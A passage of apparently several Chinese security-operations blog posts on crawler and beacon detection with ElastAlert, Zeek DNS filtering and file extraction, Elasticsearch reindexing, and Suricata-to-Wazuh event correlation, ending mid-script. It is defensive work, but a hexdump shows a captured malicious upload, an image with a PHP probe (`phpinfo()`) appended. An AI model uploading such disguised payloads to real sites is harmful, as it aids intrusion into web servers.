self.NUM_PROCESSES = int(self.rules['beacon']['threads'])
self.UA_PROCESSES = int(self.rules['beacon']['user_agent'])

self.TIMESTAMP = '@timestamp'
self.FORMAT_TIMESTAMP = self.rules['timestamp'].get('format', None)

self.beacon_module = self.rules['beacon']['beacon_module']
self.WINDOW = int(self.rules['beacon']['window'])
self.MIN_INTERVAL = int(self.rules['beacon']['min_interval'])
buffer_time = str(self.rules['buffer_time'])
self.PERIOD = ':'.join(buffer_time.split(':')[:2])

self.fields = self.normalized_field(self.rules['field'])
self.src_ip = self.fields['aliases']['src_ip']
self.url = self.fields['aliases']['url']
self.url_path = self.fields['aliases']['url_path']
self.http_host = self.fields['aliases']['http_host']
self.user_agent = self.fields['aliases']['user_agent']

self.json = self.rules['output']['json'].get('enable', None)
self.redis = self.rules['output']['redis'].get('enable', None)

self.q_job = JoinableQueue()
self.l_df = Lock()
self.l_list = Lock()

def normalized_field(self, d):
fields = {'hash': [], 'output': [], 'aliases': {}}
for field, info in d.items():
alias = info['alias']
fields['aliases'][alias] = field
for i in info.get('type', []):
fields[i].append(field)
return fields

def add_data(self, data):
# Detection of spider crawlers
self.df = pd.json_normalize(data)
results = self.find_spiders()

d = results.to_dict(orient="records")

# Output to local files
if self.json:
json_path = self.rules['output']['json']['path']
with open(json_path, 'a') as out_file:
for i in d:
out_file.write(json.dumps(i) + '\n')

# Output to Redis Server
if self.redis:
try:
host = self.rules['output']['redis']['host']
port = self.rules['output']['redis']['port']
password = self.rules['output']['redis']['password']
db = self.rules['output']['redis']['db']
key = self.rules['output']['redis']['key']
ioc = self.rules['output']['redis']['field']

redis_conn = conn(host=host, port=port,
password=password, db=db)
IoC = results[ioc].unique().tolist()
put_data(redis_conn, key, IoC)
except:
elastalert_logger.error("Output Redis configuration errors.")
self.add_match(d)

# The results of get_match_str will appear in the alert text
def get_match_str(self, match):
return json.dumps(match)

def add_match(self, results):
for result in results:
super(SpiderRule, self).add_match(result)

def get_args_hash(self, args, session_id):
return hash(tuple(args + [session_id]))

def get_query_str(self, request):
query = request.split('?')[-1]
query_str = dict([i.split("=", 1) for i in query.split(
"&") if i if len(i.split("=", 1)) == 2])
query_str['args_list'] = list(query_str.keys())
query_str['max_length'] = len(query_str)
query_str['url_sample'] = request
return query_str

def percent_grouping(self, d, total):
interval = 0
# Finding the key with the largest value (interval with most events)
mx_key = int(max(iter(list(d.keys())), key=(lambda key: d[key])))
mx_percent = 0.0

for i in range(mx_key - self.WINDOW, mx_key + 1):
current = 0
# Finding center of current window
curr_interval = i + int(self.WINDOW / 2)

for j in range(i, i + self.WINDOW):
if j in d:
current += d[j]

percent = float(current) / total * 100
if percent > mx_percent:
mx_percent = percent
interval = curr_interval

return interval, mx_percent

def find_beacon(self, session_data):
beacon = {}

if not self.FORMAT_TIMESTAMP:
session_data[self.TIMESTAMP] = pd.to_datetime(
session_data[self.TIMESTAMP])
else:
session_data[self.TIMESTAMP] = pd.to_datetime(
session_data[self.TIMESTAMP], format=self.FORMAT_TIMESTAMP)
session_data[self.TIMESTAMP] = (
session_data[self.TIMESTAMP].astype(int) / 1000000000).astype(int)

session_data = session_data.sort_values([self.TIMESTAMP])
session_data['delta'] = (
session_data[self.TIMESTAMP] - session_data[self.TIMESTAMP].shift()).fillna(0)
session_data = session_data[1:]
d = dict(session_data.delta.value_counts())

for key in list(d.keys()):
if key < self.MIN_INTERVAL:
del d[key]

# Finding the total number of events
total = sum(d.values())
if d and total > self.MIN_HITS:
window, percent = self.percent_grouping(d, total)
if percent > self.THRESHOLD_PERCENT and total > self.MIN_HITS:
beacon = {
'percent': int(percent),
'interval': int(window),
}

return beacon

def find_spider(self, q_job, spider_list):
while not q_job.empty():
session_id = q_job.get()
self.l_df.acquire()
session_data = self.df[self.df['session_id']
== session_id]
self.l_df.release()

query_str = session_data[self.url].apply(
lambda req: self.get_query_str(req)).tolist()
query_data = pd.DataFrame(query_str)

# get args_hash
query_data['args_hash'] = query_data['args_list'].apply(
lambda args: self.get_args_hash(args, session_id))

for i in query_data['args_hash'].unique():
result = {
"detail": {
'percent': {},
'unique': {}
},
"tags": [],
"src_ip": session_data[self.src_ip].tolist()[0],
"url_path": session_data[self.url_path].tolist()[0],
"http_host": session_data[self.http_host].tolist()[0],
"unique_ua": session_data[self.user_agent].unique().shape[0],
"alert": False,
}

df = query_data[query_data['args_hash'] == i]
count_args_length = df['max_length'].iloc[0]
if count_args_length > self.MAX_ARGS_LENGTH:
continue

total_hits = df.shape[0]
if total_hits < self.MIN_HITS:
continue

args_list = df['args_list'].iloc[0]
for i in args_list:
unique_args = len(df[i].unique())
if unique_args == 1:
continue

# Calculate the percentage based on the number of changes in the parameters
current_percent = int((unique_args / total_hits) * 100)
if current_percent < self.THRESHOLD_PERCENT:
continue

result['detail']['percent'][i] = current_percent
result['detail']['unique'][i] = unique_args

# Number of parameters with changes
count_unique_args = len(result['detail']['unique'])
if count_unique_args <= self.MAX_UNIQUE_ARGS:
result['alert'] = True

if not result['detail']['unique']:
continue

# Beacon analysis
if self.beacon_module:
result['beacon'] = self.find_beacon(
session_data.reset_index(drop=True))

result['args_list'] = args_list
result['total_hits'] = total_hits
result['url_sample'] = df['url_sample'].iloc[0]
result['period'] = self.PERIOD

if result['alert']:
result['tags'].append('enumerate')

if result['beacon']:
result['tags'].append('beacon')

if result['unique_ua'] >= self.UA_PROCESSES:
result['tags'].append('suspicious-ua')

self.l_list.acquire()
spider_list.append(result)
self.l_list.release()
q_job.task_done()

def find_spiders(self):
if self.df.empty:
raise Exception(
"Elasticsearch did not retrieve any data. Please ensure your settings are correct inside the config file.")

tqdm.pandas(desc="Detection of Spider Crawlers.")

# get url_path
self.df[self.url_path] = self.df[self.url].str.split('?').str.get(0)

# add session_id from hash fields
self.df['session_id'] = self.df[self.fields['hash']
].progress_apply(lambda row: hash(tuple(row)), axis=1)
# split url
self.df = self.df[self.df[self.url].apply(lambda request: True if len(
request.split('?')) == 2 else False)].reset_index(drop=True)
# normalized url
self.df[self.url] = self.df[self.url].apply(
lambda request: html.unescape(request))
# unique session_id
unique_session = self.df['session_id'].unique()

for session in unique_session:
self.q_job.put(session)

mgr = Manager()
spider_list = mgr.list()
processes = [Process(target=self.find_spider, args=(
self.q_job, spider_list,)) for thread in range(self.NUM_PROCESSES)]

# Run processes
for p in processes:
p.start()

# Exit the completed processes
for p in processes:
p.join()

results = pd.DataFrame(list(spider_list))

# add timestamp
now = datetime.datetime.now().isoformat()
results['timestamp'] = now

if not results.empty:
results = results[results['alert'] == True]

match_log = "Queried rule %s matches %s crawl events" % (
self.rules['name'],
results.shape[0]
)
elastalert_logger.info(match_log)

return results

配置文件
  • Web.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
name: "Detection of Spider Crawlers"
es_host: "es_server"
es_port: 9200
type: "elastalert_modules.spider.my_rules.SpiderRule"

index: "zeek-other-%Y.%m.%d"
use_strftime_index: true

filter:
- term:
host: "canon88.github.io"
- term:
method.keyword: "GET"

include: ["true_client_ip", "host", "uri", "uri_path", "user_agent"]

timestamp:
format: false
timestamp_field: "@timestamp"

buffer_time:
hours: 12

run_every:
minutes: 10

max_query_size: 10000
scroll: true

beacon:
max_args_length: 10 # 最大检测参数个数
min_hits: 120 # 最小命中事件数
max_unique_args: 2 # 最大动态变化参数
threshold_percent: 70 # 请求阈值百分比
threads: 16 # 多进程
beacon_module: true # 开启周期性检测
min_interval: 1 # 最小周期
window: 2 # 抖动窗口
user_agent: 20 # 唯一UA个数

field:
true_client_ip:
alias: src_ip
type: [hash]
host:
alias: http_host
type: [hash]
uri_path:
alias: url_path
type: [hash]
uri:
alias: url
user_agent:
alias: user_agent

output:
json:
enable: yes # 本地输出
path: /var/log/spider/spider_detect.json
redis:
enable: no # 输出至Redis,联动情报数据进行研判。
host: redis_server
port: 6379
db: 0
password: redis_password
key: spider:feeds
field: src_ip

alert:
- debug

告警输出
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
{
"detail": {
"percent": {
"cookieid": 81
},
"unique": {
"cookieid": 133
}
},
"tags": [
"enumerate", // 存在参数遍历行为
"suspicious-ua" // user_agent 超过阈值
],
"src_ip": "54.160.169.250",
"url_path": "/image/cookieId.html",
"http_host": "canon88.github.io",
"unique_ua": 47,
"alert": true,
"beacon": {},
"args_list": [
"cookieid"
],
"total_hits": 164,
"url_sample": "/image/cookieId.html?cookieid=E99A3E54-5A81-2907-1372-339FFB70A464",
"period": "1:00",
"timestamp": "2020-06-02T11:07:59.276581"
}
简述

find_spider: 用于检测参数遍历的行为,这里加上find_beacon是为了增加一个周期性的检测维度。当然很多爬虫都会「自带」时间抖动,以及使用爬虫池,所以效果并不是特别明显。

find_beacon:更适用于检测C2连接,例如针对DNS域名的请求这种情况,这里有一个检测到的域名周期性请求的告警:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
{
"src_ip": "x.x.x.228",
"hostname": "entitlement.service.imperva.com",
"answers": [
"joxkwsf.x.incapdns.net",
"45.60.73.51"
],
"percent": "100",
"interval": 1800,
"occurrences": 23,
"timestamp": "2020-06-01T08:03:38.164363",
"period": 12,
"event_type": "beaconing",
"num_hits": 806379,
"num_matches": 3,
"kibana_url": "https://canon88.github.io/goto/5f089bcc411426b854da71b9062fdc8c"
}

image-20200603113849810

总结

​ 1小时内,IP: 54.160.169.250 总共访问了该接口164次且cookieid参数更换了133次,占到总请求量的81%。并更换了47个不同的user_agent。

image-20200602114610615

参考

Flare

ElastAlert

背景

  1. 本地环境中部署了2台NTA(Suricata)接收内网12台DNS服务器的流量,用于发现DNS请求中存在的安全问题。近一段时间发现2台NTA服务器运行10小时左右就会自动重启Suricata进程,看了一下日志大概意思是说内存不足,需要强制重启释放内存。说起这个问题当时也是花了一些时间去定位。首先DNS这种小包在我这平均流量也就25Mbps,所以大概率不是因为网卡流量过大而导致的。继续定位,由于我们这各个应用服务器会通过内网域名的形式进行接口调用,所以DNS请求量很大。Kibana上看了一下目前dns_type: query事件的数据量320,000,000/天 ~ 350,000,000/天(这仅仅是dns_type: query数据量,dns_type: answer 数据量也超级大)。由于Suricata不能在数据输出之前对指定域名进行过滤,这一点确实很傻必须吐槽。当时的规避做法就是只保留dns_type: query事件,既保证了Suricata的正常运行也暂时满足了需求。

  2. 近一段时间网站的某个上传接口被上传了包含恶意Payload的jpg与png。虽然Suricata有检测到,但也延伸了新的需求,如何判断文件是否上传成功以及文件还原与提取HASH。虽然这两点Suricata自身都可以做,但是有一个弊端不得不说。例如Suricata只要开启file_info就会对所有支持文件还原的协议进行HASH提取。由于我们是电商,外部访问的数据量会很大,Suricata默认不支持过滤,针对用户访问的HTML网页这种也会被计算一个HASH,这个量就非常的恐怖了。

总结:针对以上2个问题,我需要的是一个更加灵活的NTA框架,下面请来本次主角 - Zeek


需求

  1. 过滤内部DNS域名,只保留外部DNS域名的请求与响应数据;
  2. 更灵活的文件还原与提取HASH;

实现

1. 过滤本地DNS请求
DNS脚本

dns-filter_external.zeek

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
redef Site::local_zones = {"canon88.github.io", "baidu.com", "google.com"};

function dns_filter(rec: DNS::Info): bool
{
return ! Site::is_local_name(rec$query);
}

redef Analyzer::disable_all = T

event zeek_init()
{
Analyzer::enable_analyzer(Analyzer::ANALYZER_VXLAN);
Analyzer::enable_analyzer(Analyzer::ANALYZER_DNS);
Log::remove_default_filter(DNS::LOG);
local filter: Log::Filter = [$name="dns_split", $path="/data/logs/zeek/dns_remotezone", $pred=dns_filter];
Log::add_filter(DNS::LOG, filter);
}
脚本简述:
  1. 通过Site::local_zones定义一个内部的域名,这些域名默认都是我们需要过滤掉的。例如,在我的需求中,多为内网的域名;

    1. 优化性能, 只开启DNS流量解析。由于这2台NTA只负责解析DNS流量,为了保留针对域名特征检测的能力,我选择了SuricataZeek共存,当然Zeek也可以做特征检测,只是我懒。。。通过Analyzer::enable_analyzer(Analyzer::ANALYZER_DNS);指定了只对DNS流量进行分析;
    2. 过滤日志并输出;
日志样例:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
{
"ts": 1589175829.994196,
"uid": "CPRxOZ2RtkPYhjz8R9",
"id.orig_h": "1.1.1.1",
"id.orig_p": 40411,
"id.resp_h": "2.2.2.2",
"id.resp_p": 53,
"proto": "udp",
"trans_id": 696,
"rtt": 1.3113021850585938e-05,
"query": "graph.facebook.com",
"qclass": 1,
"qclass_name": "C_INTERNET",
"qtype": 1,
"qtype_name": "A",
"rcode": 0,
"rcode_name": "NOERROR",
"AA": false,
"TC": false,
"RD": true,
"RA": true,
"Z": 0,
"answers": [
"api.facebook.com",
"star.c10r.facebook.com",
"157.240.22.19"
],
"TTLs": [
540,
770,
54
],
"rejected": false,
"event_type": "dns"
}
总结:

当采用Zeek过滤了DNS请求后,现在每天的DNS数据量 6,300,000/天 ~ 6,800,000/天(query + answer),对比之前的数据量320,000,000/天 ~ 350,000,000/天(query)。数据量减少很明显,同时也减少了后端ES存储的压力。

  • Zeek DNS (query + answer)

image-20200511135508651

  • Suricata DNS (query)

image-20200511140015791


2. 更灵活的文件还原与提取文件HASH
文件还原脚本

file_extraction.zeek

Demo脚本,语法并不是很优雅,切勿纠结。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
@load base/frameworks/files/main
@load base/protocols/http/main

module Files;

export {
redef record Info += {
hostname: string &log &optional;
proxied: set[string] &log &optional;
url: string &log &optional;
method: string &log &optional;
true_client_ip: string &log &optional;
logs: bool &log &optional;
};

option http_info = T;
}

redef FileExtract::prefix = "/data/logs/zeek/extracted_files/";

global mime_to_ext: table[string] of string = {
["text/plain"] = "txt",
["application/x-executable"] = "",
["application/x-dosexec"] = "exe",
["image/jpeg"] = "jpg",
["image/png"] = "png",
["application/pdf"] = "pdf",
["application/java-archive"] = "jar",
["application/x-java-applet"] = "jar",
["application/x-java-jnlp-file"] = "jnlp",
["application/msword"] = "doc",
["application/vnd.openxmlformats-officedocument.wordprocessingml.document"] = "docs",
["application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"] = "xlsx",
["application/vnd.openxmlformats-officedocument.presentationml.presentation"] = "pptx",
};

global file_analyzer: table[string] of bool = {
["Extraction"] = T,
};

global http_method: set[string] = {
"GET",
"POST",
};

global http_hostname: set[string] = {
"canon88.github.io",
};

global http_uri: set[string] = {
"/index.php",
"/account.php",
};

function files_filter(rec: Files::Info): bool
{
return rec?$logs;
}

event zeek_init()
{
Log::remove_default_filter(Files::LOG);
local filter: Log::Filter = [$name="file_extraction", $path="/data/logs/zeek/file_extraction", $pred=files_filter];
Log::add_filter(Files::LOG, filter);
}

event file_sniff(f: fa_file, meta: fa_metadata) &priority=3
{
if ( f$source != "HTTP" )
return;

if ( ! f$http?$method )
return;

if ( f$http$method !in http_method )
return;

if ( ! f$http?$host )
return;

if ( f$http$host !in http_hostname )
return;

if ( ! meta?$mime_type )
return;

if ( meta$mime_type !in mime_to_ext )
return;

f$info$logs = T;

if ( file_analyzer["Extraction"] )
{
local fname = fmt("%s-%s.%s", f$source, f$id, mime_to_ext[meta$mime_type]);
Files::add_analyzer(f, Files::ANALYZER_EXTRACT, [$extract_filename=fname]);
}

Files::add_analyzer(f, Files::ANALYZER_MD5);

if ( http_info )
{
if ( f$http?$host )
f$info$hostname = f$http$host;
if ( f$http?$proxied )
f$info$proxied = f$http$proxied;
if ( f$http?$method )
f$info$method = f$http$method;
if ( f$http?$uri )
f$info$url = f$http$uri;
if ( f$http?$true_client_ip )
f$info$true_client_ip = f$http$true_client_ip;
}
}


event file_state_remove(f: fa_file)
{
if ( !f$info?$extracted || !f$info?$md5 || FileExtract::prefix == "" || !f$info?$logs )
return;

local orig = f$info$extracted;
local split_orig = split_string(f$info$extracted, /\./);
local extension = split_orig[|split_orig|-1];
local ntime = fmt("%D", network_time());
local ndate = sub_bytes(ntime, 1, 10);
local dest_dir = fmt("%s%s", FileExtract::prefix, ndate);
mkdir(dest_dir);
local dest = fmt("%s/%s.%s", dest_dir, f$info$md5, extension);
local cmd = fmt("mv %s/%s %s", FileExtract::prefix, orig, dest);
when ( local result = Exec::run([$cmd=cmd]) )
{

}
f$info$extracted = dest;
}
脚本简述:
 1. 支持针对指定hostname,method,url,文件头进行hash的提取以及文件还原;
 2. 默认文件还原按照年月日进行数据的存储,保存名字按照MD5名称命名;
 3. 丰富化了文件还原的日志,增加HTTP相关字段;
日志样例
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
{
"ts": 1588891497.173108,
"fuid": "FhOGNc2zDdlF3AP5c",
"tx_hosts": [
"1.1.1.1"
],
"rx_hosts": [
"2.2.2.2"
],
"conn_uids": [
"CItQs61wvvtPqSB0Ub"
],
"source": "HTTP",
"depth": 0,
"analyzers": [
"MD5",
"SHA1",
"EXTRACT"
],
"mime_type": "image/png",
"duration": 0,
"local_orig": true,
"is_orig": false,
"seen_bytes": 353,
"total_bytes": 353,
"missing_bytes": 0,
"overflow_bytes": 0,
"timedout": false,
"md5": "fd0229d400049449084b3864359c445a",
"sha1": "d836d3f06c0fc075cf0f5d95f50b79cac1dac97d",
"extracted": "/data/logs/zeek/extracted_files/2020-05-07/fd0229d400049449084b3864359c445a.png",
"extracted_cutoff": false,
"hostname": "canon88.github.io",
"proxied": [
"TRUE-CLIENT-IP -> 3.3.3.3",
"X-FORWARDED-FOR -> 4.4.4.4"
],
"url": "/image/close.png",
"method": "GET",
"true_client_ip": "3.3.3.3",
"logs": true
}
文件还原

这是其中一个包含恶意Payload还原出的图片样例

image-20200511150738194

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
$ ll /data/logs/zeek/extracted_files/
total 89916
drwxr-xr-x 10 root root 150 May 11 06:14 ./
drwxr-xr-x 4 root root 67 May 11 06:00 ../
drwxr-xr-x 2 root root 50 May 5 07:54 2020-05-04/
drwxr-xr-x 2 root root 4096 May 5 23:51 2020-05-05/
drwxr-xr-x 2 root root 671744 May 6 23:41 2020-05-06/
drwxr-xr-x 2 root root 4096 May 7 22:44 2020-05-07/
drwxr-xr-x 2 root root 741376 May 8 23:59 2020-05-08/
drwxr-xr-x 2 root root 23425024 May 9 23:59 2020-05-09/
drwxr-xr-x 2 root root 25047040 May 10 23:59 2020-05-10/
drwxr-xr-x 2 root root 24846336 May 11 06:14 2020-05-11/

$ xxd /data/logs/zeek/extracted_files/2020-05-07/884d9474180e5b49f851643cb2442bce.jpg
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 003c 0000 003c 0806 0000 003a fcd9 ...<...<.....:..
00000020: 7200 0000 1974 4558 7453 6f66 7477 6172 r....tEXtSoftwar
00000030: 6500 4164 6f62 6520 496d 6167 6552 6561 e.Adobe ImageRea
00000040: 6479 71c9 653c 0000 0320 6954 5874 584d dyq.e<... iTXtXM
00000050: 4c3a 636f 6d2e 6164 6f62 652e 786d 7000 L:com.adobe.xmp.
..........
00001030: 8916 ce5f 7480 2f38 c073 69f1 5c14 83fb ..._t./8.si.\...
00001040: aa9d 42a3 8f4b ff05 e012 e04b 802f 01be ..B..K.....K./..
00001050: 04b8 91c7 ff04 1800 bcae 819f d1da 1896 ................
00001060: 0000 0000 4945 4e44 ae42 6082 3c3f 7068 ....IEND.B`.<?ph
00001070: 7020 7068 7069 6e66 6f28 293b 3f3e 1a p phpinfo();?>.
总结:

通过Zeek脚本扩展后,可以“随意所欲”的获取各种类型文件的Hash以及定制化的进行文件还原。

头脑风暴

当获取文件上传的Hash之后,可以尝试扩展出以下2个安全事件:

  1. 判断文件是否上传成功。

    通常第一时间会需要定位文件是否上传成功,若上传成功需要进行相关的事件输出,这个时候我们可以通过采用HIDS进行文件落地事件的关联。

  2. 关联杀毒引擎/威胁情报。

    将第一个关联好的事件进行Hash的碰撞,最常见的是将HASH送到VT或威胁情报。

这里以Wazuh事件为例,将Zeek的文件还原事件与Wazuh的新增文件事件进行关联,关联指标采用Hash

a. Zeek事件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
{
"ts": 1589158812.471443,
"fuid": "FBkqzM2AFg0jrioji6",
"tx_hosts": [
"1.1.1.1"
],
"rx_hosts": [
"2.2.2.2"
],
"conn_uids": [
"CcOyQo2ziEuoLBNIb9"
],
"source": "HTTP",
"depth": 0,
"analyzers": [
"SHA1",
"EXTRACT",
"MD5",
"DATA_EVENT"
],
"mime_type": "text/plain",
"duration": 0,
"local_orig": true,
"is_orig": true,
"seen_bytes": 31,
"total_bytes": 31,
"missing_bytes": 0,
"overflow_bytes": 0,
"timedout": false,
"md5": "37a74f452f1c49854a2951fd605687c5",
"extracted": "/data/logs/zeek/extracted_files/2020-05-11/37a74f452f1c49854a2951fd605687c5.txt",
"extracted_cutoff": false,
"hostname": "canon88.github.io",
"proxied": [
"X-FORWARDED-FOR -> 3.3.3.3",
"TRUE-CLIENT-IP -> 4.4.4.4"
],
"url": "/index.php",
"method": "POST",
"true_client_ip": "4.4.4.4",
"logs": true
}

b. Wazuh 事件

image-20200511144805354

参考

reindex

1
2
3
4
5
6
7
8
9
10
11
12
from elasticsearch import Elasticsearch
from elasticsearch import helpers

host = ['es_host1', 'es_host2', 'es_host3']
port = 9200
timeout = 600
auth_user = 'elastic'
auth_password = 'hello world'
use_ssl = True
ca_certs = '/opt/certs/ca/ca.crt'

es = Elasticsearch(host, port=port, timeout=timeout, http_auth=(auth_user, auth_password), verify_certs=True, use_ssl=use_ssl, ca_certs=ca_certs)
按照指定日期重建索引
1
2
3
4
5
6
7
8
9
10
11
12
13
import datetime
import time

begin_date = (datetime.datetime.now() - datetime.timedelta(days = 10)).strftime("%Y.%m.%d")
begin_date = datetime.datetime.strptime(begin_date, "%Y.%m.%d")
end_date = (datetime.datetime.now() - datetime.timedelta(days = 1)).strftime("%Y.%m.%d")
end_date = datetime.datetime.strptime(end_date, "%Y.%m.%d")

date_list = []
while begin_date <= end_date:
date_str = begin_date.strftime("%Y.%m.%d")
date_list.append(date_str)
begin_date += datetime.timedelta(days=1)
1
2
3
4
5
6
7
8
9
10
11
date_list
['2020.03.19',
'2020.03.20',
'2020.03.21',
'2020.03.22',
'2020.03.23',
'2020.03.24',
'2020.03.25',
'2020.03.26',
'2020.03.27',
'2020.03.28']
1
2
3
4
5
6
7
8
9
chunk_size = 10000
for day in date_list:
source_index = 'wazuh-alerts-3.x-' + day
target_index = 'siem-alerts-' + day
helpers.reindex(
client=es, source_index=source_index, target_index=target_index,
target_client=es, chunk_size=chunk_size
)
print(source_index + ' -> ' + target_index + ' fin.')

写在前面

​ 这并不是什么高精尖的架构与技术。这只是我个人在工作中结合目前手头的资源进行了一些整合 。当然实现这些需求的方法有很多, 有钱的可以考虑Splunk, 没钱的有研发的团队的可以上Flink、Esper 。

需求

​ 由于攻防对抗的升级, 通过单一的数据源很难直接断言攻击是否成功。因此, 我们需要结合多个数据源进行安全事件的关联, 从中提炼出可靠性较高的安全告警进行人工排查。例如: 针对WebShell上传类的, 可以通过网络流量 + 终端进行关联; 针对Web攻击类, 可以通过WAF + NIDS的事件关联, 得到Bypass WAF 的安全告警。

解决思路

​ 虽然Wazuh本身具备安全事件的关联能力, 但在传统的部署架构中, 通常是由Wazuh Agent将安全事件发送到Wazuh Manager,通过Manager进行安全事件的关联告警。由于缺少了对数据进行ETL, 使得Wazuh Manager很难对异构数据进行关联。因此, 我们需要通过Logstash实现对数据的标准化, 并将标准化后的数据通过Syslog的形式发送到Wazuh Manager, 从而进行异构数据的关联。

坑点
  1. 本次改造采用了Syslog的形式将数据发送到Wazuh Manager端进行数据关联。由于Syslog 默认采用了UDP协议进行数据传输, 当数据发送过大时将会导致数据截断的报错。针对此问题, 需改用TCP的形式进行数据发送规避此问题。
  2. Wazuh Manager 部分告警缺少”必要“关联字段的现象。如: 本次场景中syscheck告警事件, 默认不会携带srcip的字段, 对于此问题可以通过在Manager上编写一个预处理脚本来解决。

改造

  1. 改造之前:

    Suricata (Wazuh agent) —(Agent: UDP 1514)—> Wazuh Manager

  2. 改造之后:

    所有的标准化都由Logstash来进行, Filebeat只需要做’无脑‘转发即可。

workflow:

image-20200303215020561


Filebeat配置
  • filebeat.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#=========================== Filebeat inputs =============================
filebeat.inputs:
- type: log
paths:
- "/var/log/suricata/alert-*.json"
fields_under_root: true
fields: { application: suricata }
json.keys_under_root: true
json.overwrite_keys: true
json.message_key: log
tail_files: false

scan_frequency: 1s
harvester_buffer_size: 104857600
backoff: 1s
max_backoff: 10s
close_timeout: 30m
close_inactive: 10m
clean_inactive: 72h
ignore_older: 70h
registry_file: /etc/filebeat/registry/wazuh/

#================================ Processors ==================================
processors:
- drop_fields:
fields: ["ecs.version", "agent.ephemeral_id", "agent.version", "agent.type", "agent.id", "agent.ephemeral_id", "input.type"]

#================================ Outputs =====================================
output.logstash:
hosts: ["logstash:5010"]
loadbalance: true
worker: 4
compression_level: 3
bulk_max_size: 4096

Logstash配置
  • 00_input.conf
1
2
3
4
5
6
7
input {
beats {
port => 5010
codec => "json_lines"
tags => ["beats"]
}
}
  • 50_suricata.conf
1
2
3
4
5
6
7
8
filter {
if [application] == "suricata" {
date {
match => [ "timestamp", "ISO8601" ]
target => "timestamp"
}
}
}
  • mapping.json
1
2
3
4
5
6
7
8
{
"common_mapping": {
"src_ip": "srcip",
"dest_ip": "dstip",
"src_port": "srcport",
"dest_port": "dstport"
}
}
  • 70_normalized-suricata.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
filter {
clone {
clones => [ "siem_events" ]
}
}

filter {
if [type] == "siem_events" {
mutate {
remove_field => [ "application", "type", "agent", "@version", "@timestamp"]
add_field => {
"provider" => "Suricata"
"product" => "Intrusion Detection System"
}
}

ruby {
init => "
require 'json'

mapping_json = File.read('/etc/logstash/mappings/wazuh/mapping.json')
mapping = JSON.parse(mapping_json)
@common_mapping = mapping['common_mapping']
"

code => "
keys = event.to_hash.keys
keys.each do |key|
if @common_mapping.include? key then
value = event.get(key)
event.remove(key)
new_key = @common_mapping[key]
event.set(new_key, value)
end
end

sensor = event.get('[host][name]')
event.set('sensor', sensor)
"
}
}
}
  • 99_output-elasticsearch.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
output {
if [event_type] == "alert" {
elasticsearch {
cacert => "/etc/logstash/certs/ca/ca.crt"
user => "elastic"
password => "Hello World!"
hosts => ["https://elasticsearch:9200"]
index => "suricata-%{+YYYY.MM.dd}"
template => "/etc/logstash/index-template.d/suricata-template.json"
template_name => "suricata"
template_overwrite => true
}
}
}
  • 99_output-wazuh.conf
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
output {
if [provider] == "Suricata" {
syslog {
host => "wazuh"
protocol => "tcp"
port => 514
codec => "json"
sourcehost => "logstash"
appname => "NORMALIZED"
}
#stdout {
#codec => rubydebug
#}
}
}

Wazuh配置
  • custom-syscheck.py

    Wazuh Manager 新增预处理脚本对指定的安全事件进行预处理。如: syscheck事件增加srcip字段。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
import json
import sys
import time
import os
from datetime import datetime, timedelta, timezone

# ossec.conf configuration:
# <integration>
# <name>custom-syscheck</name>
# <rule_id>554</rule_id>
# <group>syscheck</group>
# <alert_format>json</alert_format>
# </integration>

# Global vars
debug_enabled = False
pwd = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
json_alert = {}
now = time.strftime("%a %b %d %H:%M:%S %Z %Y")
wazuh_server = "192.168.199.97"

# Set paths
log_file = '{0}/logs/integrations.log'.format(pwd)
syscheck_file = '{0}/logs/syscheck.json'.format(pwd)

def iso8601(hours=8):
td = timedelta(hours=hours)
tz = timezone(td)
return datetime.now(tz=tz).isoformat()

def main(args):
debug("# Starting")

# Read args
alert_file_location = args[1]

debug("# File location")
debug(alert_file_location)

# Load alert. Parse JSON object.
with open(alert_file_location) as alert_file:
json_alert = json.load(alert_file)
debug("# Processing alert")
debug(json_alert)

alert = normalized_data(json_alert)
with open(syscheck_file, 'a') as f:
msg = json.dumps(alert)
f.write(msg + '\n')

def debug(msg):
if debug_enabled:
msg = "{0}: {1}\n".format(now, msg)
